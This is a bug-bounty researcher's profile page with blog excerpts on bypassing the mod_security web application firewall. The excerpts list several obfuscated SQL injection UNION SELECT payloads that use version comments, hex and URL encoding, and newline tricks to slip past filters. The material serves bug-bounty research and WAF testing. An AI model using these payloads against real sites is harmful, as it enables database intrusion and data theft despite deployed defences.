_Y000_ | Security Researcher Profile

Researcher reputation:  0

Real name:
Luis Madero

About me:
computer systems engineer, computer security technician and data network, finder, English teacher, 23 years old

How to contact me:
via Twitter: https://twitter.com/_Y000_

Certifications & Diplomas:
computer systems engineer, computer security and data network technician,etc...

Experience in Application Security
1-3 years

Award / Bug Bounty I prefer:
-Halls of fame
-bug bounty payment
-a simple recommendation or thanks

Anything its ok for me!

[email protected]

Follow me on:
Twitter

Recommendations and Acknowledgements

Honor Badges

Number of Secured Websites

10+ Websites	50+ Websites	500+ Websites	WEB SECURITY VETERAN 1000+ Websites

Advanced Security Research

WAF Bypasser	CSRF Master 30+ Reports	AppSec Logic Master 30+ Reports	Fastest Fix Fix in 24 hours

Outstanding Achievements

Secured OBB	OBB Advocate	Improved OBB

Commitment to Remediate and Patch

Patch Master 55% Patched	Patch Guru 65% Patched	Patch Lord 75% Patched

Recommendations and Recognition

REPUTABLE 10+ Recommends	FAMOUS 25+ Recommends	GLOBALLY TRUSTED 50+ Recommends

Distinguished Blog Author

1 Post	3 Posts	5+ Posts

Research Statistics

Open Bug Bounty Certificate

25.12.2020  How to bypass mod_security (WAF)

Hello, this time I would like to share with you how to evade the WAF mod_security.

Looking for vulnerable pages I came across a website that, after spending a little time on it, I realized that it could be vulnerable to sql injections, then I realized that it was “protected” with mod_security and decided to see if I could skip the waf.

I share how I did it …

10.12.2020  sql injection to bypass Mod_Security

sql injection + bypass Mod_Security

/*!50000un0x696fn*/+/*!12345AlL*/(/*!50000se0x6c65ct*/+1)

/*!50000%75%6e%69on*/ %73%65%6cect 1

/*!12345UnioN*//**/(/*!12345seLECT*//**/1)

/*!12345#qa%0A#%0AUnIOn*/(/*!12345#qa%0A#%0ASeleCt*//**/1)

10.12.2020  Create encoded sql payloads